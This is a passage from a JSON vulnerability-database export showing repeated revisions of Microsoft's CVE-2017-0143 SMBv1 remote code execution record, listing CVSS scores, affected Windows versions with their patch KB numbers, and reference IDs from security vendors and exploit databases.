for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the 